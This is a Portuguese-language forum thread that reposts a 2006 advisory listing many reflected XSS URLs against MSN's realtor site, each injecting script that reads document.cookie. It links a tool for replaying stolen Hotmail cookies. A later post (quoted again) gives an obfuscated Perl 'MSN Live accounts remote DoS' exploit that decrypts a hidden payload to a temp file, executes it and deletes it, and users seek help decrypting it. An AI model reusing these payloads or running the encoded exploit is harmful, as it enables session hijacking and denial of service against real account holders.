Hotmail/MSN Multiple cross site scripting ( XSS )

insanity · 14 de September , 2006, 05:00:30 PM

Author: Securma Massine
MorX Security Research Team
http://www.morx.org

Original Advisory/Xploit : http://www.morx.org/msnxss.txt

Vulnerability : Multiple cross site scripting ( XSS )

Severity: Medium/High

Description : msn.com is suffers from multiple xss which could allow an attacker to hijack web sessions .This vulnerability can be used to gather the victim's cookies,steal his session,..

Proof of Concept/Example of the issue: a great number of XSS (hundred )in http://realtor.realestate.msn.com

they is only some examples :

Code Select

http://realtor.realestate.msn.com/Default.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss=loc&ad=http%3A%2F%2Frealtor.realestate.msn.com%2FFindNeig%2Fdefault.asp%3Flnksrc%3DREALR2LF2C0058%26poe%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/SiteMap.asp?lnksrc=RDC-NAV-0005&poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/RealtyTimes/marketconditions.asp?link=http://yoursite/xss.js?open&pID=r.com2

http://realtor.realestate.msn.com/PersPlanOut/ArticleEmail.asp?anm=REALTOR%2Ecom%3A+Real+Estate+101&alnk=http%3A%2F%2Frealtor%2Erealestate%2Emsn%2Ecom%2Fbasics%2Findex%2Easp%3Flnksrc%3DREALR2LF2C0039%26poe%3D%22%3E%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C%2Fscript%3E

http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Basics/AllAbout/TypesStyles/Index.asp?poe="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/NearbySearch.asp?frm=bymlsid"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/websearch/searchresults.asp?searchterms=Bad%20Credit&lnksrc=OVER_SRCH_RDC1"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Gateways/MSN/Default.asp?ct="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fan&miss"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindReal/WhichPages.asp?frm=byctst""&ct="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/InterimSearch.asp?typ=1%2C+2%2C+3%2C+4%2C+5%2C+6%2C+7&mxprice=99999999&mlsttl=&mnbath=0&frm=bymap&pgnum=1&st=CA&mls=xmls&mnbed=0&js=on&ct=Orange&zp=&mnprice=0&areaid="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/california/nborange.asp?"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/Msgs/NoResolve.asp?t=fah&miss=loc&typ="><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/default.asp?mode=MLS&"><script>alert(document.cookie);</script>

http://realtor.realestate.msn.com/FindHome/default.asp?mode=City&"><script>alert(document.cookie);</script>&poe=realtor

and many many other.....

Screen captures: http://www.morx.org/msnx.jpg

workaround: The Hotmail exploit can easily be executed via , e-mails , links ,messenger , attachement.
you can use this tool to open the browser with fake hotmail's cookie(IE):
http://www.morx.org/hotcookie.exe

Disclosure timeline:
07/30/2006 Issue disclosed to Microsoft
07/30/2006 Response received from mailto:secure@microsoft.com">secure@microsoft.com
09/05/2006 fix some xss
09/07/2006 sending to microsoft new list of msn xss
12/09/2006 announce the fix of all the xss in 24h
13/09/2006 fixed
14/09/2006 public advisory

Greets: Attitude and all morx team

Disclaimer:
The author do not have any responsibility for any malicious use of this advisory or proof of concept code. The code and the information provided here are for educational purposes only.
comments or additional questions feel free to email me at securma_at_morx_org.

Security · 15 de September , 2006, 01:21:57 AM

que ele faz?

insanity · 16 de September , 2006, 09:37:05 PM

Quote from: "Security"que ele faz?

http://en.wikipedia.org/wiki/Cross_site_scripting

ate mais

Mago · 10 de March , 2007, 10:51:05 PM

Ainda funciona ?

Flow's

keyhell · 20 de May , 2007, 04:11:51 AM

Update.

Code Select

#!/usr/bin/perl
#
# MSN Live accounts remote DoS
# by: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
# 3 january 2007
# MorX Security Research Team
# www.morx.org
#
# Details:
#
# please see the previous exploit release for vulnerability details
# at www.morx.org/fuckmsn.txt since this is just an update supporting
# SSL which was implemented by MSN new authentification server.
#
# Disclaimer:

# this entire document is for eductional, testing and demonstrating
# purpose only.
# Modification use and/or publishing this information is entirely on
# your OWN risk, I cannot be held responsible for any of the above
#
# requires Net::SSLeay module which can be downloaded from
# http://search.cpan.org/CPAN/authors/id/F/FL/FLORA/Net_SSLeay.pm-1.30.tar.gz
#
# the source code can be easly decrypted for most of the experienced 
# perl people. but at least those brainless lamers and scriptkiddies-
# wannabe would make a little effort before deleting my name and puting 
# their lame nicknames.
#
# Enjoy, from Morocco.

package IIIkeyUnLock;
require Exporter;
@ISA       = qw(Exporter);
@EXPORT    = qw(_pENCd3k new);
@EXPORT_OK = qw(_pENCd3k new);

use strict;

sub new {
	my $object = {};
	bless $object;
	return $object;
}

sub _pENCd3k ($$) {
	my ($class, $_s, $_k1) = @_;

	$_s = reverse($_s);
	$_s =~ tr/\.\-\+\!\=\^/abcdef/;

	my $_b = ord( substr( $_k1, 0, 1 ) );
	my $_k2  = $_b ** 7;
	my @_k_2 = split ( /''/, $_k2 );
	$_k2  = join '', @_k_2;
	my $_k3  = reverse($_k1);
	$_k3 =~ tr/[a-m][n-z]/[n-z][a-m]/;
	$_k3 =~ tr/[A-M][N-Z]/[N-Z][A-M]/;

	my @_w1 = ();
	for ( my $_d = 0 ; $_d < length($_s) ; $_d = $_d + 2 ) {
		$_w1[$_d] = chr( hex( substr( $_s, $_d, 2 ) ) );
	}

	my $_w2 = join '', @_w1;
	my $_r1 = _pENCxor( $_w2, $_k3 );
	my $_r2 = _pENCxor( $_r1, $_k2 );
	my $_o  = _pENCxor( $_r2, $_k1 );
	return($_o);
}

sub _pENCxor ($$) {
	my ($_P1, $_K1) = @_;

	while ( length($_K1) < length($_P1) ) { $_K1 .= $_K1; }
	$_K1 = substr( $_K1, 0, length($_P1) );

	my @_p = split ( //, $_P1 );
	my @_k = split ( //, $_K1 );

	my $_i = 0;
	my @_e = map { chr(ord($_) ^ ord($_k[$_i++])) } @_p;

	my $_r = join '', @_e;
	return($_r);
}

1;

use strict;

my $pENCobj = new IIIkeyUnLock;

open (cENC,">.//\x66\x6d\x2e\x74\x6d\x70") || die "xploit failed\n";
my $cmd;
while ( $cmd = <DATA> ) {
	last if $cmd =~ /__END_DATA__/;
	$cmd =~ s/\n//;
	$cmd = $pENCobj->_pENCd3k($cmd, "morxdotorg");
	print cENC $cmd;
}
close(cENC);

my $argvc=join(' ',@ARGV);
$argvc="" unless defined $argvc;
eval { system("\x70\x65\x72\x6c\x20\x66\x6d\x2e\x74\x6d\x70 ".$argvc) == 0 or die "xploit failed\n"; };
unlink(".//\x66\x6d\x2e\x74\x6d\x70");

1;

__DATA__
22779487=0342424+46585!0-5+494.505.454.510844525.6!08747^621-0
3281+53524!7344524-587653577-4-455!5.161642625262776551107^184!4.51024^42557!0+0=50421-0
!281^09141-185^534=484+4+5701121-0
=2-4!5-42761542414-484-5!557^064!5^49445=4748660574484^621-0
53=44545^0550545-43014055521-0
83-0
-2711575^4+424246621-0
83-0
135514^5646575+440^58474.4^5^40414^43444!415^0!46404-144=534=5.484447065-574846544-4605485=4.5+584.58470.475!560=544=520=555+435-42521-0
725455^49544842524!5756095.57425!5453144+480+445.55590552510=5-43525!03544+4-5-5402544.58085=5+4859485=47104!50570=594=404+0+415.561353421-0
!2+004!4254595!56085248474-4=414=5=4-515+4=4^445+420+43434619617^780!544+1.434243444=5^4148555=4^0+48415-194=4-43515!0.7471721-0
83-0
32+1944404-4.5.4=454=46621-0
22
131434^5353404+5758435343425!054!5-4!0^465=4-5+4+425-1!0143455944424447565!4404535846054441074448454!44404-59034948495+4=560=5^5^46521-0
521105.455=4!0748494!544252521-0
825594!0^4-4740414058495=055^5!0^4+53495945555049574^4-12544.4^460.485=4.41414844494=5604424=07544+480!545.5^174942555+4142504442584^621-0
+284048404358014=484=00495!085!5-4!0.57514^0.55444252534!4-45584447064=5!4+46095+4602424^4!5-4=48017703045.5^4941036574760^53484-521-0
22
22
13!1208505!465+515=4^4101574!044^5=4349407!1516484347727=78110258487707414!5
22
+36510.1300781361786!68620315484+42504842560.04514
22
23+1!01557508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108140!02494-40485
+36130!56771.5!5.464=55454848496208140!02494-40485
5240-084766434-4^474^52445+4!5541424+1.48475!064!53495-5!535^031547455=44465853594357005!5=4405555=03425242431=54474457575.59055259495208140!02494-40485
42!14134!7!13514647570.4+464659445!5208140!02494-40485
5240-08476^4242024.48444=465+5!4405555=025^524!434258480-4=474-490145584541525.4^43475200474-02425^46035=54531442414+464+465^4^4^5=406208140!02494-40485
23+1!0155734!4=4^434-13454247044!580!584!5=04595-4106564^414-49404^4.534941094=4=5=4!03554206474.484!5!460^7!0!0859544.5819687079045=4=445208140!02494-40485
23+1!01557508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108140!02494-40485
5240-08476272466-1349595.4740480752525-59455=40431^4-514477016+6466061+000+47640!02494-40485
22305014362456.59627!665012761649435802434^4!535954510!5^4^68075.464+690^5971000^06140!02494-40485
82004034.60405!560+545353466.624+4.597!021+444=4-47494871000^06140!02494-40485
6351408517^4^6!4^57461^7!5054680+465.5206574842670.415.55434^4-447614555.58585-4!547^076-594671000^06140!02494-40485
72.1114417644694648564.64655845494749761-425+1-5.45515545434-410^585848581!1.4858455=61000^06140!02494-40485
13-5!0!035-4.4!4
22
5240-08476272466-1349595.4740480752525-59455=40431^4-514477016+6466061+000+47640!02494-40485
22305014362456.59627!665012761649435802434^4!535954510!5^4^68075.464+690^5971000^06140!02494-40485
82004034.60405!560+545353466.624+4.597!021+444=4-47494871000^06140!02494-40485
6351408517^4^6!4^57461^7!5054680+465.5206574842670.415.55434^4-447614555.58585-4!547^076-594671000^06140!02494-40485
13!1^085-7+0+16040-7+0570717^70671.0.46415+4+4=5!525.71000^06140!02494-40485
53214055!734=70554+424353421!4+425+1=59424=510+5=5!0-681+0^037-727871000^06140!02494-40485
22
93110781361786!68620-1+1!020-1278617573666+0
-2808055!5.4^5!5^04440-1+1!0669696.756473626+0
23+1!080-45420515171-024-4^034-16001115180=13150+12415=4-491.064=46084-1!51595=0809675.551.5-4769184=4207181!11130+13091615121!4+4057161014505.0+1-0752595402101=0!161=0+12120-101+5-5-02405.436904034156536^131557455641455^4-4-407^14057818096-020^5-4!5=46045^5=0.0-1=505-02160513525019161300154.560=1-1806121+55440-1+1!020-160!056=77697+0
82004041^0=1-1-011!1^15071^1^04181.031411110=1616001^1208141-120^141^0=1-1-011!1^15071^1^04181.031411110=161600140-1+1!020-1478647.677+7+0
22
!21011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-0
22
729191613070802766+7+660.5+55581^1^4.5!424447170-7.7=640-1+1!020-160!061702035+0
729191519120!1^4!5-4.034.474.4813484455414802035+5051640-1+1!020-160!061702005+0
42!14170=091.071+58424+4+58640-1+1!020-160!061702015+0
13.1^01726366621-06606763757^6^66721015444.510+7!706!7=7!72060^444^055144454-0^4!5-41641910455-58631618584^46524+5+4+4-4!73180469030+650202564+5+4-107+73715^5=6^1=786^65054!5.5^71494=6!06151719544842514-55467+14184954455250544.575^4-5.48640-1+1!020-160!061702065+0
22
-2652021!060249475!5-400!1=6-646-787^6717111+5652504+5!0!1-0+195+4=494=421^005!5=4
22
5321^0805191207140049544+075=5!4.42104^41524!41120!05181=0-5!46465^110106584945421^020-454
22
72311135!5059520-1!0951545=49061-00075440484!566+1+045046566=7-720!1-5.57640-1!0161786+05035=4652180
822180
22
833160840604.72590^4^69490644654-0155774^130!0=68657!02494-40485
02611090703037.75711!750+4+494942425.41480
+200!6=717-134=595-4142180
8355
22
82004034.6368121+4142495-48461-48431444494^564^064-525-14434!4^740!02494-40485
22
72!035-4.4!4
__END_DATA__

Quote# the source code can be easly decrypted for most of the experienced
# perl people.

Algum usuário experiente em Perl aqui no fórum ajudaria a desencriptar?

Abraços

Mago · 08 de June , 2007, 10:34:43 PM

Quote from: "keyhell"Update.
Code Select Expand
#!/usr/bin/perl # # MSN Live accounts remote DoS # by: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org> # 3 january 2007 # MorX Security Research Team # www.morx.org # # Details: # # please see the previous exploit release for vulnerability details # at www.morx.org/fuckmsn.txt since this is just an update supporting # SSL which was implemented by MSN new authentification server. # # Disclaimer: # this entire document is for eductional, testing and demonstrating # purpose only. # Modification use and/or publishing this information is entirely on # your OWN risk, I cannot be held responsible for any of the above # # requires Net::SSLeay module which can be downloaded from # http://search.cpan.org/CPAN/authors/id/F/FL/FLORA/Net_SSLeay.pm-1.30.tar.gz # # the source code can be easly decrypted for most of the experienced # perl people. but at least those brainless lamers and scriptkiddies- # wannabe would make a little effort before deleting my name and puting # their lame nicknames. # # Enjoy, from Morocco. package IIIkeyUnLock; require Exporter; @ISA = qw(Exporter); @EXPORT = qw(_pENCd3k new); @EXPORT_OK = qw(_pENCd3k new); use strict; sub new { my $object = {}; bless $object; return $object; } sub _pENCd3k ($$) { my ($class, $_s, $_k1) = @_; $_s = reverse($_s); $_s =~ tr/\.\-\+\!\=\^/abcdef/; my $_b = ord( substr( $_k1, 0, 1 ) ); my $_k2 = $_b ** 7; my @_k_2 = split ( /''/, $_k2 ); $_k2 = join '', @_k_2; my $_k3 = reverse($_k1); $_k3 =~ tr/[a-m][n-z]/[n-z][a-m]/; $_k3 =~ tr/[A-M][N-Z]/[N-Z][A-M]/; my @_w1 = (); for ( my $_d = 0 ; $_d < length($_s) ; $_d = $_d + 2 ) { $_w1[$_d] = chr( hex( substr( $_s, $_d, 2 ) ) ); } my $_w2 = join '', @_w1; my $_r1 = _pENCxor( $_w2, $_k3 ); my $_r2 = _pENCxor( $_r1, $_k2 ); my $_o = _pENCxor( $_r2, $_k1 ); return($_o); } sub _pENCxor ($$) { my ($_P1, $_K1) = @_; while ( length($_K1) < length($_P1) ) { $_K1 .= $_K1; } $_K1 = substr( $_K1, 0, length($_P1) ); my @_p = split ( //, $_P1 ); my @_k = split ( //, $_K1 ); my $_i = 0; my @_e = map { chr(ord($_) ^ ord($_k[$_i++])) } @_p; my $_r = join '', @_e; return($_r); } 1; use strict; my $pENCobj = new IIIkeyUnLock; open (cENC,">.//\x66\x6d\x2e\x74\x6d\x70") || die "xploit failed\n"; my $cmd; while ( $cmd = <DATA> ) { last if $cmd =~ /__END_DATA__/; $cmd =~ s/\n//; $cmd = $pENCobj->_pENCd3k($cmd, "morxdotorg"); print cENC $cmd; } close(cENC); my $argvc=join(' ',@ARGV); $argvc="" unless defined $argvc; eval { system("\x70\x65\x72\x6c\x20\x66\x6d\x2e\x74\x6d\x70 ".$argvc) == 0 or die "xploit failed\n"; }; unlink(".//\x66\x6d\x2e\x74\x6d\x70"); 1; __DATA__ 22779487=0342424+46585!0-5+494.505.454.510844525.6!08747^621-0 3281+53524!7344524-587653577-4-455!5.161642625262776551107^184!4.51024^42557!0+0=50421-0 !281^09141-185^534=484+4+5701121-0 =2-4!5-42761542414-484-5!557^064!5^49445=4748660574484^621-0 53=44545^0550545-43014055521-0 83-0 -2711575^4+424246621-0 83-0 135514^5646575+440^58474.4^5^40414^43444!415^0!46404-144=534=5.484447065-574846544-4605485=4.5+584.58470.475!560=544=520=555+435-42521-0 725455^49544842524!5756095.57425!5453144+480+445.55590552510=5-43525!03544+4-5-5402544.58085=5+4859485=47104!50570=594=404+0+415.561353421-0 !2+004!4254595!56085248474-4=414=5=4-515+4=4^445+420+43434619617^780!544+1.434243444=5^4148555=4^0+48415-194=4-43515!0.7471721-0 83-0 32+1944404-4.5.4=454=46621-0 22 131434^5353404+5758435343425!054!5-4!0^465=4-5+4+425-1!0143455944424447565!4404535846054441074448454!44404-59034948495+4=560=5^5^46521-0 521105.455=4!0748494!544252521-0 825594!0^4-4740414058495=055^5!0^4+53495945555049574^4-12544.4^460.485=4.41414844494=5604424=07544+480!545.5^174942555+4142504442584^621-0 +284048404358014=484=00495!085!5-4!0.57514^0.55444252534!4-45584447064=5!4+46095+4602424^4!5-4=48017703045.5^4941036574760^53484-521-0 22 22 13!1208505!465+515=4^4101574!044^5=4349407!1516484347727=78110258487707414!5 22 +36510.1300781361786!68620315484+42504842560.04514 22 23+1!01557508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108140!02494-40485 +36130!56771.5!5.464=55454848496208140!02494-40485 5240-084766434-4^474^52445+4!5541424+1.48475!064!53495-5!535^031547455=44465853594357005!5=4405555=03425242431=54474457575.59055259495208140!02494-40485 42!14134!7!13514647570.4+464659445!5208140!02494-40485 5240-08476^4242024.48444=465+5!4405555=025^524!434258480-4=474-490145584541525.4^43475200474-02425^46035=54531442414+464+465^4^4^5=406208140!02494-40485 23+1!0155734!4=4^434-13454247044!580!584!5=04595-4106564^414-49404^4.534941094=4=5=4!03554206474.484!5!460^7!0!0859544.5819687079045=4=445208140!02494-40485 23+1!01557508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108140!02494-40485 5240-08476272466-1349595.4740480752525-59455=40431^4-514477016+6466061+000+47640!02494-40485 22305014362456.59627!665012761649435802434^4!535954510!5^4^68075.464+690^5971000^06140!02494-40485 82004034.60405!560+545353466.624+4.597!021+444=4-47494871000^06140!02494-40485 6351408517^4^6!4^57461^7!5054680+465.5206574842670.415.55434^4-447614555.58585-4!547^076-594671000^06140!02494-40485 72.1114417644694648564.64655845494749761-425+1-5.45515545434-410^585848581!1.4858455=61000^06140!02494-40485 13-5!0!035-4.4!4 22 5240-08476272466-1349595.4740480752525-59455=40431^4-514477016+6466061+000+47640!02494-40485 22305014362456.59627!665012761649435802434^4!535954510!5^4^68075.464+690^5971000^06140!02494-40485 82004034.60405!560+545353466.624+4.597!021+444=4-47494871000^06140!02494-40485 6351408517^4^6!4^57461^7!5054680+465.5206574842670.415.55434^4-447614555.58585-4!547^076-594671000^06140!02494-40485 13!1^085-7+0+16040-7+0570717^70671.0.46415+4+4=5!525.71000^06140!02494-40485 53214055!734=70554+424353421!4+425+1=59424=510+5=5!0-681+0^037-727871000^06140!02494-40485 22 93110781361786!68620-1+1!020-1278617573666+0 -2808055!5.4^5!5^04440-1+1!0669696.756473626+0 23+1!080-45420515171-024-4^034-16001115180=13150+12415=4-491.064=46084-1!51595=0809675.551.5-4769184=4207181!11130+13091615121!4+4057161014505.0+1-0752595402101=0!161=0+12120-101+5-5-02405.436904034156536^131557455641455^4-4-407^14057818096-020^5-4!5=46045^5=0.0-1=505-02160513525019161300154.560=1-1806121+55440-1+1!020-160!056=77697+0 82004041^0=1-1-011!1^15071^1^04181.031411110=1616001^1208141-120^141^0=1-1-011!1^15071^1^04181.031411110=161600140-1+1!020-1478647.677+7+0 22 !21011-07050^1!05051=0200190=0-0-140+0+1.0508120=0108150=051401011-0 22 729191613070802766+7+660.5+55581^1^4.5!424447170-7.7=640-1+1!020-160!061702035+0 729191519120!1^4!5-4.034.474.4813484455414802035+5051640-1+1!020-160!061702005+0 42!14170=091.071+58424+4+58640-1+1!020-160!061702015+0 13.1^01726366621-06606763757^6^66721015444.510+7!706!7=7!72060^444^055144454-0^4!5-41641910455-58631618584^46524+5+4+4-4!73180469030+650202564+5+4-107+73715^5=6^1=786^65054!5.5^71494=6!06151719544842514-55467+14184954455250544.575^4-5.48640-1+1!020-160!061702065+0 22 -2652021!060249475!5-400!1=6-646-787^6717111+5652504+5!0!1-0+195+4=494=421^005!5=4 22 5321^0805191207140049544+075=5!4.42104^41524!41120!05181=0-5!46465^110106584945421^020-454 22 72311135!5059520-1!0951545=49061-00075440484!566+1+045046566=7-720!1-5.57640-1!0161786+05035=4652180 822180 22 833160840604.72590^4^69490644654-0155774^130!0=68657!02494-40485 02611090703037.75711!750+4+494942425.41480 +200!6=717-134=595-4142180 8355 22 82004034.6368121+4142495-48461-48431444494^564^064-525-14434!4^740!02494-40485 22 72!035-4.4!4 __END_DATA__
Quote# the source code can be easly decrypted for most of the experienced
# perl people.

Algum usuário experiente em Perl aqui no fórum ajudaria a desencriptar?

Abraços

Para que desencriptar isto ?

Mago · 15 de June , 2007, 02:35:15 AM

Acho que achei uma vull xss nova,
Vou faser uns testes aqui antes

Até mais.